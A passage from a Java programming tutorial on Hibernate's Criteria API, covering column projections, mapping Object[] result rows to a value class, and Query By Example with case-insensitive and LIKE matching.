<span id="cb15-6"><a aria-hidden="true" href="#cb15-6" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">groupProperty</span><span class="op">(</span><span class="st">"color"</span><span class="op">));</span></span>
<span id="cb15-7"><a aria-hidden="true" href="#cb15-7" tabindex="-1"></a><span class="bu">List</span> result <span class="op">=</span> crit<span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>projList<span class="op">).</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>To let users query only the required columns, Hibernate 3
introduced <strong>Projections.property()</strong>.</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Employee<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb16-2"><a aria-hidden="true" href="#cb16-2" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"zipCode"</span><span class="op">,</span> zipCode<span class="op">));</span></span>
<span id="cb16-3"><a aria-hidden="true" href="#cb16-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"salary"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">10000</span><span class="op">)));</span></span>
<span id="cb16-4"><a aria-hidden="true" href="#cb16-4" tabindex="-1"></a>ProjectionList projList <span class="op">=</span> Projections<span class="op">.</span><span class="fu">projectionList</span><span class="op">();</span></span>
<span id="cb16-5"><a aria-hidden="true" href="#cb16-5" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"name"</span><span class="op">));</span></span>
<span id="cb16-6"><a aria-hidden="true" href="#cb16-6" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"age"</span><span class="op">));</span></span>
<span id="cb16-7"><a aria-hidden="true" href="#cb16-7" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"county"</span><span class="op">));</span></span>
<span id="cb16-8"><a aria-hidden="true" href="#cb16-8" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"job"</span><span class="op">));</span></span>
<span id="cb16-9"><a aria-hidden="true" href="#cb16-9" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>projList<span class="op">);</span></span></code></pre></div>
<p><em>This really helps when the table being queried contains 50 to 60
columns and we need only 4 to 5 columns.</em></p>
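<p>When several projections are set, each result row is expected to come
back as an <code>Object[]</code> whose elements follow the order in which
the projections were added. The sketch below shows one way to map such
rows to a small value class. It has no Hibernate dependency: the
hard-coded rows stand in for the result of <code>crit.list()</code>, and
<code>ProjectionRowsSketch</code>, <code>EmployeeSummary</code> and the
sample values are hypothetical names and data made up for
illustration.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Sketch only: hard-coded rows stand in for the List returned by crit.list().
public class ProjectionRowsSketch {

    // Hypothetical holder for the four projected columns
    static final class EmployeeSummary {
        final String name;
        final int age;
        final String county;
        final String job;

        EmployeeSummary(String name, int age, String county, String job) {
            this.name = name;
            this.age = age;
            this.county = county;
            this.job = job;
        }
    }

    // Maps each Object[] row to a summary, relying on the projection order:
    // name, age, county, job
    static List<EmployeeSummary> toSummaries(List<Object[]> rows) {
        List<EmployeeSummary> summaries = new ArrayList<>();
        for (Object[] row : rows) {
            summaries.add(new EmployeeSummary(
                (String) row[0],
                (Integer) row[1],
                (String) row[2],
                (String) row[3]));
        }
        return summaries;
    }

    // Made-up sample data in the same column order as the projection list
    static List<Object[]> sampleRows() {
        List<Object[]> rows = new ArrayList<>();
        rows.add(new Object[] {"Asha", 41, "Kent", "Engineer"});
        rows.add(new Object[] {"Ravi", 35, "Essex", "Analyst"});
        return rows;
    }

    public static void main(String[] args) {
        for (EmployeeSummary s : toSummaries(sampleRows())) {
            System.out.println(s.name + ", " + s.age + ", " + s.county + ", " + s.job);
        }
    }
}
```

<p>Because the mapping depends on column positions, the order of the
casts has to be kept in sync with the order of the
<code>projList.add()</code> calls.</p>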
<h3 id="query-by-example-api">Query By Example API</h3>
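<p>The Example API builds a query from a populated instance of the
entity: the property values set on the example object become the query
restrictions. The resulting Example is itself a Criterion, so it can be
fine-tuned and combined with further restrictions.</p>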
<div class="sourceCode" id="cb17"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a><span class="co">// Initializing the text values to be used</span></span>
<span id="cb17-2"><a aria-hidden="true" href="#cb17-2" tabindex="-1"></a>Accommodation accommodationEx <span class="op">=</span> <span class="kw">new</span> <span class="fu">Accommodation</span><span class="op">();</span></span>
<span id="cb17-3"><a aria-hidden="true" href="#cb17-3" tabindex="-1"></a>accommodationEx<span class="op">.</span><span class="fu">setCountry</span><span class="op">(</span>country<span class="op">);</span> </span>
<span id="cb17-4"><a aria-hidden="true" href="#cb17-4" tabindex="-1"></a>accommodationEx<span class="op">.</span><span class="fu">setCapacity</span><span class="op">(</span>capacity<span class="op">);</span></span>
<span id="cb17-5"><a aria-hidden="true" href="#cb17-5" tabindex="-1"></a></span>
<span id="cb17-6"><a aria-hidden="true" href="#cb17-6" tabindex="-1"></a><span class="co">// Creating and fine tuning the example object</span></span>
<span id="cb17-7"><a aria-hidden="true" href="#cb17-7" tabindex="-1"></a>Example example <span class="op">=</span> Example<span class="op">.</span><span class="fu">create</span><span class="op">(</span>accommodationEx<span class="op">)</span></span>
<span id="cb17-8"><a aria-hidden="true" href="#cb17-8" tabindex="-1"></a> <span class="op">.</span><span class="fu">ignoreCase</span><span class="op">()</span> <span class="co">//Queries are case insensitive</span></span>
<span id="cb17-9"><a aria-hidden="true" href="#cb17-9" tabindex="-1"></a> <span class="op">.</span><span class="fu">excludeZeroes</span><span class="op">()</span> <span class="co">//zero-valued fields are ignored</span></span>
<span id="cb17-10"><a aria-hidden="true" href="#cb17-10" tabindex="-1"></a> <span class="op">.</span><span class="fu">excludeProperty</span><span class="op">(</span><span class="st">"doNotUse"</span><span class="op">)</span> <span class="co">// this property is excluded</span></span>
<span id="cb17-11"><a aria-hidden="true" href="#cb17-11" tabindex="-1"></a> <span class="op">.</span><span class="fu">enableLike</span><span class="op">(</span>MatchMode<span class="op">.</span><span class="fu">ANYWHERE</span><span class="op">);</span> <span class="co">//query string matching uses ‘%X%’</span></span>
<span id="cb17-12"><a aria-hidden="true" href="#cb17-12" tabindex="-1"></a></span>
<span id="cb17-13"><a aria-hidden="true" href="#cb17-13" tabindex="-1"></a><span class="co">// Using the Example Object and adding further restrictions</span></span>
<span id="cb17-14"><a aria-hidden="true" href="#cb17-14" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Accommodation<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb17-15"><a aria-hidden="true" href="#cb17-15" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>example<span class="op">)</span></span>
<span id="cb17-16"><a aria-hidden="true" href="#cb17-16" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">between</span><span class="op">(</span><span class="st">"availabilityDate"</span><span class="op">,</span> startDate<span class="op">,</span> endDate<span class="op">))</span></span>
<span id="cb17-17"><a aria-hidden="true" href="#cb17-17" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>